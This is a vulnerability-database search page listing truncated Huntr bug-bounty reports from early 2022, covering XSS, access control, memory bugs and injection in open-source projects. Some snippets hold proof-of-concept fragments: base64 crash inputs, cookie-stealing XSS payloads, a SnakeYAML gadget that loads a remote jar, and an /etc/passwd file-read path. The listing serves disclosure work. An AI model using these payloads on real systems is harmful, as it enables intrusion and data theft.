Lucene search
K

4072 matches found

Huntr
Huntr
added 2022/02/10 2:29 a.m.20 views

Improper Access Control in liukuo362573/yishaadmin

Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/UploadFile" that allows uploading files without authentication. Root-cause Server doesn't check user's permission when attacker access the endpoint. After that, server will directly call UploadFile function wi...

1.1AI score
Exploits0
Huntr
Huntr
added 2022/02/09 11:8 p.m.21 views

None in radareorg/radare2

Description Use After Free occurs in riobankmapaddtop. commit : 4d75eeb99a0d913e9b443e7aaf73aa44a323739d Proof of Concept $ echo -ne "VlowMFcwMOEwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwEDAw MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAw...

7.5CVSS0.4AI score0.01243EPSS
Exploits1
Huntr
Huntr
added 2022/02/09 10:41 p.m.12 views

Heap-based Buffer Overflow in mruby/mruby

Description Heap Overflow occurs in mrbfsend. commit : d912b864df3199f2108601a0451532c587a5e830 Proof of Concept $ echo -ne "c2VuZCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2Vu ZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5kIiwic2VuZCIsInNlbmQiLCJzZW5k IgAAAAo=" | base64...

7.5CVSS0.01243EPSS
Exploits1
Huntr
Huntr
added 2022/02/09 7:18 a.m.121 views

Cross-site Scripting (XSS) - Stored in chatwoot/chatwoot

Description In order to render raw HTML in Vue.js you may use v-html attribute, which opens a door for XSS in case of malicious input. Chatwoot actually uses it in several places, such as...

3.5CVSS5.7AI score0.04542EPSS
Exploits1
Huntr
Huntr
added 2022/02/09 3:48 a.m.28 views

Cross-site Scripting (XSS) - Reflected in phoronix-test-suite/phoronix-test-suite

Description Hi, i found a Reflected XSS vulnerability POST based XSS + no CSRF token in phoronix test suite, Results tab. Proof of Concept Install a local instance of phoronix create a Search results form like this: // PoC.html history.pushState'', '', '/' document.forms0.submit; // and send to...

4.3CVSS0.8AI score0.0132EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 3:22 p.m.20 views

Cross-site Scripting (XSS) - Stored in microweber/microweber

Description There is a reflected XSS in creating and searching tag function . where any user can execute any malicious code results in the cookie stealing or Account takeover vulnerability Steps to Produce: Go to this particular URL URL Click on live edit , Now In the tag section and select the...

3.5CVSS0.3AI score0.00903EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 3:12 p.m.25 views

in vim/vim

Description Using out of range pointer offset occurs in enterbuffer. commit : b247e0622ef16b7819f5dadefd3e3f0a803b4021 This case is created to correct the previous issue. Proof of Concept $ echo -ne "ZnUgUigpCnRhYjBsb3AKZTAKbGYKZW5kZgpjYWwgUigpCm5vcm0XFjAKY2FsIFIoKQpidw==" | base64 -d mpoc Valgri...

6.8CVSS8.1AI score0.01607EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 1:36 p.m.30 views

Cross-site Scripting (XSS) - Stored in ptrofimov/beanstalk_console

Description Stored XSS in parameter 'host' when add server Proof of Concept // PoC.req GET / HTTP/1.1 Host: 127.0.0.1:8088 User-Agent: Mozilla/5.0 Macintosh; Intel Mac OS X 10.15; rv:97.0 Gecko/20100101 Firefox/97.0 Accept:...

3.5CVSS0.5AI score0.00635EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 12:44 p.m.14 views

in mruby/mruby

Description commit 4e8ab145da52c3cfb0bd4b823df8041dcc52f454 Author: Yukihiro "Matz" Matsumoto Date: Tue Feb 8 13:03:51 2022 +0900 Proof of Concept sh $ echo -ne "e30KWyoqMCxtOjBdBHM9MDYudGl0ZXN7My7+////c3slXSN7W11lYWsKYj17fQpbKiowLG06MF3/...

6.4CVSS2AI score0.01612EPSS
Exploits1
Huntr
Huntr
added 2022/02/08 7:7 a.m.11 views

Cross-site Scripting (XSS) - Reflected in effgarces/bookedscheduler

Setup the Booked Scheduler locally.URL like the following. http://192.168.5.5/phpsch/ Attcker 2. Login as valid user. 3. Make an reservation from the dashboard. 4. Open the information you reserved.URL like the following http://192.168.5.5/Web/reservation.php?rn=62020af2eee4d833634703 5. The...

0.2AI score
Exploits0
Huntr
Huntr
added 2022/02/08 4:49 a.m.23 views

Improper Access Control in liukuo362573/yishaadmin

Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DeleteFile" that allows deleting files without authentication. Root-cause Server doesn't check user's permission when attacker access the endpoint. After that, server will directly call delete function with th...

1.8AI score
Exploits0
Huntr
Huntr
added 2022/02/08 4:1 a.m.12 views

Path Traversal in liukuo362573/yishaadmin

Description https://www.github.com/liukuo362573/yishaadmin has an endpoint "/admin/File/DownloadFile" that allows downloading/deleting files without authentication. In addition, this endpoint has path traversal vulnerability that allows arbitrary file read/delete. Proof of Concept - using BurpSui...

1.1AI score
Exploits0
Huntr
Huntr
added 2022/02/08 2:23 a.m.55 views

Exposure of Sensitive Information to an Unauthorized Actor in follow-redirects/follow-redirects

Note Reclarification of https://huntr.dev/bounties/6d9fd2bf-39e4-4291-b228-30f131b9ccdc/ Description The Authorization header leaks from same hostname https-http redirect. If https://example.com redirects to http://example.com, then an attacker who can listen in on the wire or perform a MITM atta...

4.3CVSS0.4AI score0.07443EPSS
Exploits2
Huntr
Huntr
added 2022/02/07 1:16 p.m.45 views

Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Description The pimcore/pimcore package is an open source platform that provides PIM, MDM, CDP, DAM, DXP/CMS & Digital Commerce services. stored xss vulnerability occurs when you change the value of Abbreviation, Longname, Converter Service at "Settings" = "Data Objects" = "Quantity Value" in the...

3.5CVSS0.5AI score0.00537EPSS
Exploits1
Huntr
Huntr
added 2022/02/07 8:22 a.m.36 views

Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Description Cross site scripting vulnerability in pimcore,pimcore field, it is fixed in this commit 832c34 , but still it is executing xss .Icon field in events and news Proof of Concept 1 . Login to the demo account https://10.x-dev.pimcore.fun/admin/ 2. Go to settings --data objects -- classes ...

3.5CVSS0.1AI score0.01277EPSS
Exploits1
Huntr
Huntr
added 2022/02/06 9:6 p.m.44 views

Exposure of Sensitive Information to an Unauthorized Actor in eventsource/eventsource

Exposure of Sensitive Information to an Unauthorized Actor in EventSource/eventsource Reported on Feb 6th 2022 | Timothee Desurmont Vulnerability type: CWE-200 Bug Cookies & Authorisation headers are leaked to external sites. Description When fetching an url with a link to an external site...

5.8CVSS0.5AI score0.01686EPSS
Exploits1
Huntr
Huntr
added 2022/02/06 4:7 a.m.9 views

in clasp-developers/clasp

Description Clasp uses printf to log errors and useful information, in one instance of this logging - the printf call specifies format operators but lacks the appropriate arguments - leading to unrelated bytes being included in the output. Impact This vulnerability is capable of allowing an...

2AI score
Exploits0
Huntr
Huntr
added 2022/02/05 10:0 p.m.23 views

Server-Side Request Forgery (SSRF) in chocobozzz/peertube

Description First of all, Thanks to my friend Haxatron for his excellent report I read the fix commit, and I found out that the code only Checked the IP addresses and didn't check the domain names that refer to a private IP address Steps to reproduce first, set up a local server at 127.0.0.2:8000...

5CVSS0.8AI score0.00893EPSS
Exploits1
Huntr
Huntr
added 2022/02/05 3:3 p.m.31 views

OS Command Injection in microweber/microweber

Description OS command injection also known as shell injection is a web security vulnerability that allows an attacker to execute arbitrary operating system OS commands on the server that is running an application, and typically fully compromise the application and all its data. Very often, an...

9CVSS1.2AI score0.51193EPSS
Exploits4
Huntr
Huntr
added 2022/02/05 9:39 a.m.14 views

Cross-site Scripting (XSS) - Stored in livehelperchat/livehelperchat

Description LiveHelperChat is vulnerable to Stored XSS at the Message field in the Personal canned message tab of the User account page. Payload constructor.constructor'alert1' Steps to reproduce 1.Login then go to User account page https://demo.livehelperchat.com/siteadmin/user/account 2.Switch ...

3.5CVSS5.4AI score0.00607EPSS
Exploits1
Huntr
Huntr
added 2022/02/04 9:53 p.m.22 views

Cross-site Scripting (XSS) - DOM in hakimel/reveal.js

Description The onmessage event listener in /plugin/notes/speaker-view.html does not check the origin of postMessage before adding the content to the webpage. The vulnerable code allows any origin to postMessage on the browser window and feeds attacker's input to parts using which attacker can...

4.3CVSS1AI score0.03679EPSS
Exploits1
Huntr
Huntr
added 2022/02/04 4:44 p.m.12 views

Exposure of Sensitive Information to an Unauthorized Actor in cjferna/photo-services-mashup

Description Please enter a description of the vulnerability. Vulnerable URL: https://github.com/cjferna/Photo-Services-Mashup/blob/fdc12e0671e035bac00cc46ee67d456540444460/src/es/um/taw/rest/imagga/Imagga.java It contains sensitive API Keys and secret keys. Proof of Concept private final String U...

0.5AI score
Exploits0
Huntr
Huntr
added 2022/02/04 4:39 p.m.28 views

Cross-site Scripting (XSS) - Reflected in phpipam/phpipam

Description Cross-Site Scripting vulnerability which allows attackers to execute arbitrary javascript code in the browser of a victim which affected import Data set feature via a spreadSheet file upload. Proof of Concept Endpoint 1 POST http://HOST/app/admin/import-export/import-vlan-preview.php ...

0.1AI score0.00398EPSS
Exploits1
Huntr
Huntr
added 2022/02/04 9:4 a.m.58 views

in phpipam/phpipam

Description The phpIPAM 1.4.5 incorrectly assigns a privilege to a particular actor, creating an unintended sphere of control for that actor in the Import/Export feature. A normal user with the role of User could download XLS file of IP addresses, hostfile dump and export system database that...

4CVSS6.6AI score0.01015EPSS
Exploits1References1
Huntr
Huntr
added 2022/02/04 5:16 a.m.14 views

in vim/vim

Description Floating point error in tabstopfromto. commit : 7676c158798a7c90f500cab2c12af0d47bad6026 Proof of Concept $ echo -ne "bm9ybTBvMDD/MDAwMDAwMDAwMDAwMDAwMDAwMApzaWwhbm9ybRZjMDAwCQpmdSBSZXRhYihnLG4p Cm8KZXhlInJldCJhOm4KZW5kZgpjYWwgbCgiIixSZXRhYigwLDQpCnNlIHRhYnN0b3A9NTAwMDAw...

1.2AI score
Exploits0
Huntr
Huntr
added 2022/02/04 2:15 a.m.9 views

Cross-site Scripting (XSS) - Stored in bytebase/bytebase

Description Hello there, there is a stored XSS in bytebase SQL editor. Proof of Concept 1. Install bytebase on your system. 2. Go to /sql-editor and create a new query with name 3. Go back to the /sql-editor and go to Queries tab and see that a pop up appears, indicating the XSS payload is...

0.7AI score
Exploits0
Huntr
Huntr
added 2022/02/03 9:35 p.m.17 views

Exposure of Sensitive Information to an Unauthorized Actor in transloadit/uppy

Description First thanks to my friend Haxatron for this awsome report I review the @uppy/companion code from the source to the sink, and I figure out a significant issue that makes any SSRF protection Effectless. I put myself as a Developer and started to read the companion document, and then I s...

5CVSS6.8AI score0.00963EPSS
Exploits1
Huntr
Huntr
added 2022/02/03 6:46 p.m.10 views

in luigirizzo/netmap

Description In the Netmap source code, calls to DbgPrint; can be found to contain a formatting argument %p to be specific yet no argument, this would in most cases lead to nearby data being printed to the debug stream. Impact This vulnerability is capable of allowing an attacker to read data from...

2.4AI score
Exploits0
Huntr
Huntr
added 2022/02/03 6:43 p.m.11 views

Cross-site Scripting (XSS) - Stored in alanaktion/phproject

Description Stored Cross-Site Scripting XSS vulnerability due to the lack of content validation and output encoding. Then, the vulnerability can be triggered when the user previews the document´s content. Proof of Concept login and navigate task Dependencies This task depends on: This task is a...

5.1AI score
Exploits0
Huntr
Huntr
added 2022/02/03 3:46 p.m.45 views

Improper Authorization in phpipam/phpipam

Description In phpIPAM 1.4.5, a normal user with the role of Usercould view/read the log files via show-logs.php, errorlogs.php and accesslogs.php endpoints. It is supposedly accessible by the Administrator only. Proof of Concept Tested version: phpIPAM 1.4.5 Affected endpoints: 1 GET/POST...

4CVSS6.3AI score0.01015EPSS
Exploits1
Huntr
Huntr
added 2022/02/03 1:44 p.m.24 views

in mruby/mruby

Description OOB read and OOB write in mrbarypush. commit : 903c5f978a2966465d8d5c6dfac55a977d134287 Proof of Concept bash $ echo -ne "bAticjWSUkRPTkxZC2I9e30MWyohMCxtOjAwLG06MF09MXxbKiEwLG0wXQo=" |base64 -d poc ASAN $ ./bin/mruby ./poc AddressSanitizer:DEADLYSIGNAL...

6.4CVSS1.1AI score0.01153EPSS
Exploits1
Huntr
Huntr
added 2022/02/03 12:47 p.m.11 views

Improper Access Control in mautic/mautic

Description I couldn't find a suitable vulnerability type for this kind of issue, so this may be incorrect the default .htaccess file has some restrictions in the access to PHP files. Deny access via HTTP requests to all PHP files. Order deny,allow Deny from all ... Except those whitelisted bello...

7.4AI score
Exploits0
Huntr
Huntr
added 2022/02/03 12:31 p.m.16 views

Business Logic Errors in publify/publify

Description It was found that if a user tries to create an article, and want to make that article private, the functionality is not working. Proof of Concept 1. Create an article 2. Click on publish and you will see the option to visibility to make it private, but functionality is not designed...

5CVSS1.8AI score0.01567EPSS
Exploits1
Huntr
Huntr
added 2022/02/03 8:58 a.m.33 views

Improper Access Control in phpipam/phpipam

Description In phpIPAM 1.4.5, a normal user with the role of User could download or export IP subnets that may contain sensitive information related data such as IP address, IP state, MAC, owner, hostname and device via export-subnet.php endpoint. The bug is the export-subnet.php should verify th...

4CVSS6.2AI score0.01162EPSS
Exploits1
Huntr
Huntr
added 2022/02/03 7:20 a.m.10 views

in cortezaproject/corteza-server

Description During testing it was found that if a user revoke his all active session, then also user is able to make changes to his account. Proof of Concept 1. Log in to the application 2. Go to profilelogin sessions and revoke all sessions. 3. You will see that all other sessions are still vali...

0.7AI score
Exploits0
Huntr
Huntr
added 2022/02/02 5:18 p.m.18 views

Cross-site Scripting (XSS) - Stored in s-cart/s-cart

Description Stored XSS in S-Cart Version 6.8.3 affecting Product and Category module. Proof of Concept Product version: S-Cart Version 6.8.3 core 6.8.10 , https://github.com/s-cart/s-cart/releases/tag/v6.8.3 Vulnerability 1: Stored XSS In Product module 1 Endpoint: POST...

0.2AI score
Exploits0
Huntr
Huntr
added 2022/02/02 11:59 a.m.26 views

the function deepFromFlat of underscore.deep is vulnerable to prototype pollution

Prototype Pollution in Clever/underscore.deep Reported on Feb 2nd 2022 | Timothee Desurmont Description Vulnerability type: CWE-1321 Version 0.5.1 of underscore.deep is vulnerable to prototype pollution; the function deepFromFlat in underscore.deep.js do not check if the attribute resolves to the...

7.5CVSS1.5AI score0.00976EPSS
Exploits1
Huntr
Huntr
added 2022/02/02 4:45 a.m.6 views

Improper Authorization in bytebase/bytebase

Description Hello bytebase team, there is an improper privilege management in bytebase source code. This allows a user to view another user inbox. Proof of Concept 1. Install bytebase, create new user user1and user2 2. Login as user1, go to this link /api/inbox?user=user-id and change user-id to ...

2.4AI score
Exploits0
Huntr
Huntr
added 2022/02/01 6:32 p.m.11 views

in gpac/gpac

Description Null Pointer Dereference in afrtboxread Proof of Concept echo AAAAEW1ldGFzXSAAAABkaXIAAAAAYWZydHRzdnB5dG/oAwBtAGwAAm0= | base64 -d poc gdb output bash pwndbg r -bt poc Starting program: /run/shm/gpac/bin/gcc/MP4Box -bt poc ERROR: Could not find ELF base! Thread debugging using...

1AI score
Exploits0References1
Huntr
Huntr
added 2022/01/31 2:12 p.m.32 views

in mruby/mruby

Description There is a NULL Pointer Dereference in ivfree src/variable.c:232:20. This bug has been found on mruby lastest commit hash 00f2b74ab2c1f03084908c815dcd0934f9fc702a on Ubuntu 20.04 for x8664/amd64. Proof of Concept 3.timese=0," =c= y:0,0 0" Steps to reproduce 1- Clone repo and build wit...

7.8CVSS0.2AI score0.00918EPSS
Exploits1
Huntr
Huntr
added 2022/01/31 2:9 p.m.12 views

Command Injection in ibotpeaches/apktool

Description Arbitrary code execution when an APK is built with a malicious apktool.yml due to SnakeYAML's load function Proof of Concept 1: Modify apktool.yml somevar: !!javax.script.ScriptEngineManager !!java.net.URLClassLoader !!java.net.URL "http://127.0.0.1:8000/yaml-payload.jar" 2: Download...

0.2AI score
Exploits0
Huntr
Huntr
added 2022/01/31 12:56 p.m.22 views

in gpac/gpac

Description Null Pointer Dereference in gitnboxdel Proof of Concept bash echo -n AAAAEW1ldGEwMDAwMDAwMDAAAABjMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAAAAARZ2l0bjAwMDAwMDAwMA== | base64 -d poc ./MP4Box -bt ./poc...

4.3CVSS0.8AI score0.04615EPSS
Exploits2References1
Huntr
Huntr
added 2022/01/31 11:25 a.m.32 views

None in vim/vim

Description Use After Free in enterbuffer function. commit : 5703310e640c4b142a16a3ea4f45317565ae8c32 Proof of Concept bash $ echo -ne "ZnUgUigpCiAgdGFiIGxvcAogIGxldCBsOj1nCiAgZQEKbGYKZW5kZgoKY2FsIGFzYWwoIiIsUigp KQpjYWwgYXNhbCgiIixSKCkpCmNhbCBhc2FsKCIiLFIoKSkKYnchCg==" | base64 -d poc ASAN $...

6.8CVSS8.5AI score0.01395EPSS
Exploits1
Huntr
Huntr
added 2022/01/31 9:45 a.m.15 views

Cross-site Scripting (XSS) - Reflected in ptrofimov/beanstalk_console

Description Beanstalk Console is vulnerable to reflected Cross-Site Scripting via the server parameter. Steps to reproduce 1. Setup the Beanstalk console locally. 2. Go to https://localhost/public/? and add a random server. 3. Visit...

4.3CVSS0.6AI score0.0087EPSS
Exploits1
Huntr
Huntr
added 2022/01/30 4:11 p.m.28 views

in alextselegidis/easyappointments

Description The software is a booking management system that has a public form to place bookings, and a private area for the calendar and management of services, users, settings, etc... There is a backend API that allows data manipulation, including listing the appointments for a specific time...

6.4CVSS0.6AI score0.38133EPSS
Exploits7
Huntr
Huntr
added 2022/01/30 12:2 p.m.11 views

Cross-site Scripting (XSS) - Reflected in navigatecms/navigate-cms

Description Cross-Site Scripting is vulnerability which allows attackers to execute arbitrary javascript code in the browser of victim. Proof of Concept Parameter: id Payload: alertdocument.cookie Affected endpoints: On Firefox browser, visit: 1...

1.1AI score
Exploits0References1
Huntr
Huntr
added 2022/01/30 11:25 a.m.8 views

Cross-site Scripting (XSS) - Stored in s-cart/core

Description Multiple Stored XSS exists in S-Cart Version 6.8.4 and below leads to cookie stealing of any victim that visits the affected URL. This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie. Proof of Conce...

6.3AI score
Exploits0References1
Huntr
Huntr
added 2022/01/30 3:7 a.m.15 views

Improper Privilege Management in liangliangyy/djangoblog

Description Hi there, I would like to report an improper privilege management vulnerability in djangoblog source code. This would allow an attacker to create comment on behalf of anyone. Proof of Concept 1. Install a local instance of djangoblog, login as admin and create an article 2. Create a n...

0.6AI score
Exploits0
Huntr
Huntr
added 2022/01/30 2:41 a.m.12 views

Cross-site Scripting (XSS) - Stored in liangliangyy/djangoblog

Description Hi there, I would like to report a stored Cross Site Scripting vulnerability in djangoblog source code. Cross-site scripting also known as XSS is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. It allow...

0.8AI score
Exploits0References1
Huntr
Huntr
added 2022/01/29 9:37 p.m.9 views

in microweber/microweber

Description In the Microweber CMS, there are two endpoints that can be used together to get local file inclusion vulnerability. 1. /api/BackupV2/upload?src=/etc/passwd 2. /api/BackupV2/download?file=passwd When logged in as administrator, we can upload any readable file from the operating system...

7.2AI score
Exploits0
Total number of security vulnerabilities4072